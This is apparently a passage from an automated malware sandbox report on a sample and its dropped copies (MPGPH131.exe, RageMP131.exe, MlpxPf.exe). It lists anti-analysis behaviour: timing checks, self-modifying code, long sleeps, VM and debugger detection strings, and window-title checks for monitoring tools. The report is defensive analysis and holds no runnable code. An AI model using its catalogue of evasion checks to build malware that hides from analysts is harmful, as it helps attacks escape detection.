            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E105DF second address: 4E105E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSpecial instruction interceptor: First address: 3BDC24 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSpecial instruction interceptor: First address: 56AB88 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSpecial instruction interceptor: First address: 569DBF instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSpecial instruction interceptor: First address: 3BB5CE instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSpecial instruction interceptor: First address: 58EC1A instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSpecial instruction interceptor: First address: 5FA601 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 97DC24 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: B2AB88 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: B29DBF instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 97B5CE instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: B4EC1A instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: BBA601 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: A7DC24 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: C2AB88 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: C29DBF instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: A7B5CE instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: C4EC1A instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: CBA601 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_04E80C47 rdtsc 0_2_04E80C47
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow / User API: threadDelayed 1095Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow / User API: threadDelayed 1101Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1171Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1116Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 786Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1235Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1091Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 752Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 623Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 998Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1501Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 937Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 421Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 637Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-23599
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeEvaded block: after key decisiongraph_18-1177
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1059
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 4300Thread sleep time: -54027s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 3552Thread sleep count: 1095 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 3552Thread sleep time: -2191095s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 3032Thread sleep count: 173 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 3032Thread sleep count: 236 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 1452Thread sleep count: 229 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 4136Thread sleep count: 1101 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 4136Thread sleep time: -2203101s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2160Thread sleep count: 93 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2160Thread sleep time: -186093s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2056Thread sleep count: 111 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2056Thread sleep time: -222111s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3212Thread sleep count: 148 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2756Thread sleep count: 103 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2756Thread sleep time: -206103s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1796Thread sleep count: 103 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1796Thread sleep time: -206103s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4996Thread sleep count: 105 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4996Thread sleep time: -210105s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3964Thread sleep count: 81 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3964Thread sleep time: -162081s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3212Thread sleep count: 1171 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3212Thread sleep time: -118271s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7348Thread sleep count: 1116 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7348Thread sleep count: 786 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7348Thread sleep time: -78600s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4268Thread sleep count: 111 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4268Thread sleep time: -222111s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3364Thread sleep count: 103 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3364Thread sleep time: -206103s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6908Thread sleep count: 140 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6908Thread sleep time: -280140s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1036Thread sleep count: 147 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6664Thread sleep count: 111 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6664Thread sleep time: -222111s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1036Thread sleep count: 1235 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1036Thread sleep time: -124735s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7352Thread sleep count: 1091 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7352Thread sleep count: 752 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7352Thread sleep time: -75200s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4352Thread sleep count: 99 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4352Thread sleep time: -198099s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7632Thread sleep count: 623 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7632Thread sleep time: -1246623s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7636Thread sleep count: 998 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7636Thread sleep time: -1996998s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7576Thread sleep count: 180 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7644Thread sleep count: 1501 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7644Thread sleep time: -3003501s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7576Thread sleep count: 263 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7800Thread sleep count: 246 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7660Thread sleep count: 937 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7660Thread sleep time: -1874937s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7652Thread sleep count: 421 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7652Thread sleep time: -842421s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7640Thread sleep count: 637 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7640Thread sleep time: -1274637s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_00351718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00351754h2_2_00351718
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_00591718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00591754h18_2_00591718
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_003529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_003529E2
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_005929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,18_2_005929E2
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_00352B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00352B8C
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: MPGPH131.exe, 0000000B.00000002.3924069074.00000000012FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53
            Source: Amcache.hve.2.drBinary or memory string: VMware
            Source: MPGPH131.exe, 00000008.00000002.3926322511.0000000000F1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}D
            Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: MlpxPf.exe, 00000002.00000003.1465233712.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000002.1570645851.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000003.1465075782.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.0000000001264000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.00000000012D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: RageMP131.exe, 00000011.00000003.1673209891.00000000016E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: MPGPH131.exe, 00000008.00000002.3909475155.00000000003AD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}4
            Source: MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}2
            Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000DB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&\
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925752788.0000000000CFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},
            Source: MPGPH131.exe, 00000008.00000002.3926322511.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B87B9D
            Source: MPGPH131.exe, 00000008.00000002.3926322511.0000000000F51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1507948511.0000000000DC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000DB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
            Source: Amcache.hve.2.drBinary or memory string: vmci.sys
            Source: MPGPH131.exe, 0000000B.00000002.3926018738.00000000016AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_
            Source: Amcache.hve.2.drBinary or memory string: VMware20,1
            Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&|
            Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: MPGPH131.exe, MPGPH131.exe, 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, RageMP131.exe, 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: MPGPH131.exe, 0000000B.00000002.3926018738.00000000016AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}^
            Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.2.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
            Source: RageMP131.exe, 00000011.00000003.1673209891.00000000016E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}{
            Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: MlpxPf.exe, 00000012.00000003.1623765347.0000000001286000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000003.1624643108.0000000001286000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
            Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: MPGPH131.exe, 00000008.00000002.3926322511.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
            Source: MlpxPf.exe, 00000002.00000002.1570645851.0000000001370000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000003.1465075782.0000000001370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: RageMP131.exe, 00000011.00000002.3926399137.00000000016E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B87B9DD7
            Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: RageMP131.exe, 00000011.00000002.3926399137.00000000016D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: MlpxPf.exe, 00000002.00000003.1465075782.0000000001349000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000002.1570645851.000000000132E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: MlpxPf.exe, 00000012.00000003.1801469713.00000000012F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\user
            Source: RageMP131.exe, 00000011.00000002.3926399137.00000000016D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&=
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAPI call chain: ExitProcess graph end nodegraph_2-1034
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_04E8030D Start: 04E8039B End: 04E803680_2_04E8030D
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_054C0052 Start: 054C00AD End: 054C007211_2_054C0052
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: NTICE
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: SICE
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
